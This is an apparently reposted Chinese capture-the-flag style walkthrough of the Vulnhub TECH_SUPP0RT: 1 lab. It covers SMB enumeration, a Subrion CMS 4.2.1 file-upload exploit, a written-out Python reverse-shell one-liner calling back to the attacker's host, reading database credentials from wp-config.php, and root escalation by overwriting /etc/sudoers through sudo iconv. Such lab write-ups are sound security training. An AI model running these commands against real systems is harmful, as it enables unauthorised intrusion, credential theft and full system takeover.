Vulnhub-TECH_SUPP0RT: 1渗透

这篇具有很好参考价值的文章主要介绍了Vulnhub-TECH_SUPP0RT: 1渗透。希望对大家有所帮助。如果存在错误或未考虑完全的地方,请大家不吝赐教,您也可以点击"举报违法"按钮提交疑问。

一、前言

由于在做靶机的时候,涉及到的渗透思路是非常的广泛,所以在写文章的时候都是挑重点来写,尽量的不饶弯路。具体有不不懂都的可以直接在文章下评论或者私信博主
 如果不会导入Vulnhub靶机和配置网络环境的话,请点我直达发车文章!

 👉本文Vulnhub靶机下载连接-戳我直接下载!👈

1、靶机ip配置

  • Kali IP:192.168.2.4
  • 靶机IP:192.168.2.6靶机ip获取方式如下图
    Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

2、渗透目标

  • 获取到/root/目录下的flag文件

3、渗透概括

  1. smb信息获取
  2. 使用CyberChef解密密码
  3. 利用Subrion CMSv 4.2.1文件上传漏洞获取shell
  4. 反弹shell
  5. 通过web源码获取信息
  6. 通过sduo iconv越权读写文件配合sudoers文件进行提权

开始实战

一、信息获取

使用nmap工具对靶机做基本的信息收集nmap -sS -sV -A -T4 -p- 靶机IP如下所示
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全
可以看到,开放的几个端口是22/ssh 80/http 139,445/smb
22/sshssh可以直接pass掉了,这个版本基本上没有什么可利用的漏洞了,一般获取到了用户信息或者爆破的时候才使用这个
80/http基本上大部分的漏洞都是存在于web服务上(至少vulnhub上的靶机是这样的)
139,445/smb这两个端口扫出来的服务是smb服务,我们后续可以进行枚举,看看能不能获取到有用的信息

二、使用smb服务获取信息

那我们首先看看smb服务,我们首先使用smbclient -L //192.168.2.6/命令看一下共享的目录(没有密码直接回车即可)
如下图可疑看到有一个websvr的目录
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

我们在使用smbclient //192.168.2.6/websvr 命令登录一下smb服务
ls命令可以看到有一个enter.txt的文本文件
我们再使用get enter.txt命令将该文件下载到本地来,最后使用exit命令即可退出smb服务
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

我们使用cat命令看一下这个文件内容
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

翻译如下
给了我们一些目标,一个账户和一个加密过的密码
目标2说了一个/subrion无法工作的问题,并且要在panel进行编辑
并告诉我们这个是Subrionwordpress的凭据
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

三、密码破解

我们到CyberChef看看这个密码能不能直接解密
我们通过如下操作将这个解密的字符串破解
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全
可以看到,已经进行解密了,admin密码是Scam2021
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

80/http基本上大部分的漏洞都是存在于web服务上,我们访问看看,如下图。是一个Apache的默认页
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

我们直接访问/subrion/panel这个目录,发现了一个登录页面
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

四、获取webshell

我们直接用我们上一步获取到的账户密码即可登录
在左下角可以看到该站点的版本信息是Subrion CMSv 4.2.1
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

我们使用命令searchsploit Subrion 4.2.1搜索一下这个版本的框架的exp
如下,发现可以使用的exp是比较多的,但是能够获取shell的只有第三个的文件上传exp
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

我们使用命令cp /usr/share/exploitdb/exploits/php/webapps/49876.py .将该exp拷贝到当前目录来
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

再使用如下命令即可获取到shell

python3 49876.py -u http://192.168.2.6/subrion/panel/ -l admin -p Scam2021

Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

五、反弹shell

由于该exp提供的shell不是很好用,我们重新反弹一个
我们在kali里面使用nc -lvvp 1234命令监听一下shell
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

然后使用如下命令将shell发送到我们kali监听的端口

export RHOST="192.168.2.4";export RPORT=1234;python -c 'import sys,socket,os,pty;s=socket.socket();s.connect((os.getenv("RHOST"),int(os.getenv("RPORT"))));[os.dup2(s.fileno(),fd) for fd in (0,1,2)];pty.spawn("/bin/bash")'

Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

如下,此时靶机的shell成功反弹到我们的kali上来了
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

六、web配置文件获取信息

由于该靶机存在wordpress站点,那么肯定会有数据库的配置文件,是可以看到明文用户和密码的
我们到wordpress的目录下,如下图wp-config.php就是数据库wordpress的数据库配置文件
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

如下图,我们使用cat命令看一下这个配置文件
我们就可以看到里面有一个用户support和一个密码ImAScammerLOL!123!
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

七、提权

我们现在使用命令cd /home到家目录看看有哪些用户
如下图可以看到i一个scamsite用户
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

我们直接用上一步获取的密码登录一下这个用户看看
如下图可以正常登录
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

我们使用sudo -l命令看看sudo权限的命令
如下图发现iconv命令是可以免密以sudo权限执行的
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

iconv具有sudo权限,我们是可以通过sudo以root权限查看指定的文件或者修改其内容
我们现在的思路就是通过修改/etc/sudoers文件的内容来进行提权
我们先到tmp目录(没有权限限制),然后再通过mkdir tiquan创建一个文件夹,然后进入这个文件夹
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

再通过如下命令将/etc/sudoers文件读取出来,并且进行备份

sudo iconv -f 8859_1 -t 8859_1 "/etc/sudoers" > sudo.bak

Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

再使用vim对这个备份文件进行修改
scamsite用户所对应的一行修改为如下图红框标注的内容即可
修改完之后记得保存
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

再使用如下命令将修改好的sudo.bak文件进行还原

cat sudo.bak |sudo iconv -f 8859_1 -t 8859_1 -o "/etc/sudoers"

Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

最后再使用sudo su命令即可成功提权到root权限
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全

我们切换到root的家目录
使用cat命令查看flag文件root.txt即完成了所有的渗透
Vulnhub-TECH_SUPP0RT: 1渗透,Vulnhub靶机渗透,安全,web安全,安全威胁分析,网络攻击模型,密码学,网络安全文章来源地址https://www.toymoban.com/news/detail-810968.html

到了这里,关于Vulnhub-TECH_SUPP0RT: 1渗透的文章就介绍完了。如果您还想了解更多内容,请在右上角搜索TOY模板网以前的文章或继续浏览下面的相关文章,希望大家以后多多支持TOY模板网!

本文来自互联网用户投稿,该文观点仅代表作者本人,不代表本站立场。本站仅提供信息存储空间服务,不拥有所有权,不承担相关法律责任。如若转载,请注明出处: 如若内容造成侵权/违法违规/事实不符,请点击违法举报进行投诉反馈,一经查实,立即删除!

领支付宝红包 赞助服务器费用

相关文章

  • [渗透测试学习靶机07] vulnhub靶场 Prime 2

    Kali的IP地址:192.168.127.139 靶机的IP地址:192.168.127.145 目录 一、信息搜集 二、漏洞挖掘 三、漏洞利用 四、提权 总结: Prime 2这个靶机我看网上很少有人通关打靶练习,自己尝试做了一下,感觉整体难度:比较难,大家可以参考一下。 1.1、扫描主机IP 1.2、扫描端口 发现开放了

    2024年02月05日
    浏览(48)
  • [VulnHub靶机渗透]:billu_b0x 快速通关

    目录 前言: 访问80端口的web页面 1.扫描目录

    2024年01月21日
    浏览(42)
  • Vulnhub靶机渗透之新手入门 JIS-CTF入门靶场-学习笔记

    目录 学习前言 准备工作 一、寻找目标主机(信息收集) 二、敏感文件 三、Getshell上传木马 用蚁剑进行Getshell 四、寻找Linux密码进行ssh连接 五、连接SSH最后一步 六、总结 vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去

    2024年02月14日
    浏览(41)
  • 看完这篇 教你玩转渗透测试靶机vulnhub——My File Server: 2

    vulnhub是个提供各种漏洞平台的综合靶场,可供下载多种虚拟机进行下载,本地VM打开即可,像做游戏一样去完成渗透测试、提权、漏洞利用、代码审计等等有趣的实战。 这是一个漏洞靶机,老样子需要找到flag即可。 官方下载:https://download.vulnhub.com/myfileserver/My_file_server_2.o

    2023年04月19日
    浏览(49)
  • vulnhub靶机AI-Web-1.0渗透笔记(文件上传,提权部分各种姿势)

    信息收集就略了,nmap就可以了,没有太多知识 你会收集到 1.网页绝对路径,这里通过sql注入上传文件或者通过sqlmap获取–os-shell会用到 2.http://靶场ip/se3reTdir777/index.php# 这是一个sql注入页面 先测试有无SQL注入漏洞,输入SQL注入测试神技  \\\' 进行测试 提示我们存在SQL语句错误,表

    2024年01月21日
    浏览(46)
  • 实训渗透靶场02|3星vh-lll靶机|vulnhub靶场Node1

    写在前面: 此博客仅用于记录个人学习进度,学识浅薄,若有错误观点欢迎评论区指出。欢迎各位前来交流。(部分材料来源网络,若有侵权,立即删除) netdiscover扫描目的IP 发现开放端口为22和3000 访问3000 3000端口是node 对node.js稍有了解的都知道 3000是node.js的默认端口,简

    2024年02月13日
    浏览(36)
  • 网络安全竞赛——综合靶机渗透测试ZHCS-2全过程解析教程

    任务一:综合靶机渗透测试 任务环境说明: 服务器场景:ZHCS-2(关闭连接) 服务器场景操作系统:版本不详 扫描目标靶机将靶机开放的所有端口,当作flag提交(例:21,22,23)   FLAG:22,80 扫描目标靶机将靶机的http服务版本信息当作flag提交(例:apache 2.3.4)   FLAG: lighttpd 1.

    2024年02月09日
    浏览(43)
  • 【Vulnhub】搭建Vulnhub靶机

    Vulnhub它是一个提供各种网络攻防靶场的平台,里面大部分的环境是要用VMware或者VirtualBox打开运行的。 去vulnhub的官网 https://www.vulnhub.com可以看到各种镜像。 点击某一个进入我们可以看到关于镜像的详细信息,包括:镜像描述、难度等级、下载地址等。 通过下载地址下载完成

    2024年02月05日
    浏览(48)
  • Vulnhub: bassamCTF: 1靶机

    kali:192.168.111.111 靶机:192.168.111.210 端口扫描 修改hosts文件 爆破出子域名 welcome 对子域目录爆破 index.php 存在文件读取 查看 /etc/passwd 和 config.php 用 config.php 中的账号密码登录ssh,账号: test ,密码: test123 查看test用户的历史命令发现文件 MySecretPassword MySecretPassword 文件内容

    2024年02月11日
    浏览(39)
  • Vulnhub靶机:driftingblues 2

    运行环境:Virtualbox 攻击机:kali(10.0.2.15) 靶机:driftingblues2(10.0.2.18) 目标:获取靶机root权限和flag 靶机下载地址:https://www.vulnhub.com/entry/driftingblues-2,634/ 使用nmap主机发现靶机ip: 10.0.2.18 使用nmap端口扫描发现靶机开放端口: 21、22、80 21端口:nmap扫描发现ftp存在匿名登录

    2024年02月02日
    浏览(37)

觉得文章有用就打赏一下文章作者

支付宝扫一扫打赏

博客赞助

微信扫一扫打赏

请作者喝杯咖啡吧~博客赞助

支付宝扫一扫领取红包,优惠每天领

二维码1

领取红包

二维码2

领红包